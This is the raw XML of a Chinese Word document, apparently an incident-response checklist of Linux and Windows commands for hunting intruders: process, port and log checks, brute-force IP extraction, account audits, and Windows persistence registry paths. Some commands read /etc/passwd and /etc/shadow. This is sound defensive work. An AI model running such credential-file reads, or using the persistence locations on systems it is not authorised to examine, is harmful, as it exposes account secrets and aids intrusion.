        <w:t>查看历史操作记录：history2.查看系统内核版本：uname -a3.查看CPU：cat /proc/cpuinfo4.查看网络：ifconfig -a5.查看内存：cat /proc/meminfo6.查看硬盘分区信息：lsblk -a7.查看网卡硬件信息：lspci | grep -i 'eth'8.查看BIOS信息：dmidecode -t bios9.查看系统所有活动的socket连接：netstat –an10.监听端口：netstat -utnpl11.查看网络连接：Netstat –anop12.查看启用的进程：lsof -i13.显示本机的arp缓冲区内容：arp -a14.屏蔽IP：iptables –A OUTPUT –d 104.31.225.6 –j DROP15.查看PID对应的CMD：ps -a16.查看程序的PID及cpu占用：ps -aux17.查看进程：ps -ef18.通过进程ID找到打开的端口和文件：Lsof –p  PID19.查看端口运行情况：lsof -i :端口20.查看进程数：pstree21.查看进程CPU占用：sysdig -c topprocs_cpu22.进程使用情况：top23.结束进程：kill -9 PID24.查看开机启动项：cat /etc/rc.local                               cat /etc/rc.d/rc.local                               ls /etc/rc.d                               ls /etc/rc3.d                               ls /etc/init.d25.查看计划任务：crontab -l                            cat /etc/crontab                            crontab –u root –l                            ls /etc/cron.*                            ls /var/spool/cron/26.查看几天内更改的文件：Find –type f –mtime -27.查看一个文件的权限：getfacl 文件名28.查看文件具体信息：stat 文件名29.锁定目录：chattr +i file30.设置权限：chmod 00031.查看用户组：cat /etc/group32.查看系统注册账号：cat /etc/passwd33.查看是否产生了新的root权限用户：grep "0" /etc/passwd34.查看账户文件修改时间：ls -l /etc/passwd35.查看账户中特权用户：awk –F:  '$3==0 {print $1}' /etc/passwd36.查看账户中空登录口令账户：Awk –F: 'length($2)==0 {print $1}'  /etc/shadow37.查看能够登录的帐号：cat /etc/passwd  | grep -E "/bin/bash$"38.锁定用户：usermod -L 用户名                      passwd -l 用户名39.解锁用户：usermod -u 用户名                      passwd -u 用户名40.查看网络服务：cat /etc/services41.查看环境变量：echo $PATH42.查看host是否被更改：cat /etc/hosts43.查看ssh版本：ssh -V44.查看ssh配置文件及时间：stat /usr/sbin/sshd45.检测sshd是否有邮箱信息：strings /usr/sbin/sshd46.查看登录成功的用户：grep 'Accepted' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr47.查看登录失败的用户：grep 'Failed' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr48.当前登录用户信息：w49.显示最近用户登录信息：last50.系统中所有用户在最近一次登录信息：lastlog51.显示用户错误登录的信息：lastb52.安全日志：/var/log/secure53.sftp上传日志：/var/log/messages54.查看相关系统日志配置情况：cat /etc/rsyslog.conf55.定位多少IP在爆破root账号：grep “Failed password for root” /var/log/secure | awk ‘{print $11}’ | sort | uniq -c | sort -nr | more56.定位有哪些IP在爆破：grep “Failed password” /var/log/secure|grep -E -o “(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)”|uniq -c57.爆破用户的字典：grep “Failed password” /var/log/secure|perl -e ‘while($_=&lt;&gt;){ /for(.*?) from/; print“$1\n”;}’|uniq -c|sort -nr58.登录成功的IP有哪些：grep “Accepted ” /var/log/secure | awk ‘{print $11}’ | sort | uniq -c | sort -nr | more59.登录成功的日期、用户名、IP：grep “Accepted ” /var/log/secure | awk ‘{print $1,$2,$3,$9,$11}’60.增加的用户：grep “useradd” /var/log/secure61.删除的用户：grep “userdel” /var/log/secure62.查看进程或者文件的MD5：md5sum 文件名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windos命令：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6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6"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.系统基本信息：win+r cmd systeminfo2.网络配置信息：win+r cmd ipconfig /all 3.查看网络联通性: win+r cmd ping 地址4.查看ip地址与物理地址映射：win+r cmd arp -a5.跟踪路由：win+r cmd tracert -d 地址6.查看路由表：win+r cmd route print7.查看进程联网，可以直接定位到进程：win+r cmd Netstat –bno8.查看端口开启情况：win+r cmd Netstat -ano9.通过PID查找对应进程：win+r cmd tasklist|findstr “&lt;PID号&gt;”10.通过进程id查看对应的服务：win+r cmd tasklist /svc11.查看进程：win+r cmd Tasklist12.查看进程文件：win+r wmic process list13.查看进程模块：win+r cmd Tasklist /m14.查看计划任务：win+r taskschd.msc15.查看启动项：win+r msconfig16.打开注册表：win+r regedit16.1.注册表启动路径：Run：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOneceWindows\load：HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows\loadUserinit注册键：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\UserinitExplorer\Run注册键：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run                                  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunRunOnce\Setup注册键：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup                                      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\SetupRunServices：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices                      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesRunServicesOnce：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce                               HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce17.当前用户启动文件夹路径：C:\\Documents and Settings\&lt;用户名字&gt;\「开始」菜单\程序\启动18.所有用户启动文件夹路径：C:\\Documents and Settings\All Users\「开始」菜单\程序\启动19.镜像劫持注册表路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options20.文件关联注册表路径：HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command                                      HKEY_CLASSES_ROOT\Word.Document.12\shell\Open\command21.查看服务：win+r services.msc22.服务注册表路径：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services23.查看最近打开文件：win+r %UserProfile%\Recent24.关键目录：win+r %appdata%                                %temp%                                 %LocalAppData%                                %ProgramData%                                %WinDir%25.查看克隆用户注册表路径：HKEY_LOCAL_MACHINE\SAM\SAM26.日志查看：win+r Eventvwr.msc27.查看本机开启的所有服务：win + r net start28.查看MD5值：win + r certutil -hashfile 文件名/进程 MD529.查看SHA1值：win + r certutil -hashfile 文件名/进程 SHA130.查看SHA256值：win + r certutil -hashfile 文件名/进程 SHA256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AE217"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B0CAE2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D9A497"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DAD9A49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DD83B22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DD83B22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40A7469"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="440A7469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5CB1E40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55CB1E40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EAA3D6A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5EAA3D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E1600B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E1600B4"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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</w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:nsid w:val="7E277460"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E277460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03621B"/>
    <w:rsid w:val="12812E13"/>
    <w:rsid w:val="4355744C"/>
    <w:rsid w:val="5A230185"/>
    <w:rsid w:val="5EF01178"/>
    <w:rsid w:val="659869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0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3 Char"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:sz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4"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10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4949</Words>
  <Characters>6855</Characters>
  <Paragraphs>440</Paragraphs>
  <TotalTime>31</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6966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2022-03-11T12:08:00Z</dcterms:created>
  <dc:creator>V2049A</dc:creator>
  <cp:lastModifiedBy>等</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-12T15:54:04Z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4F655A29292B41FF9C63FCBAC912F25C</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.11115</vt:lpwstr>
  </property>
</Properties>
</file>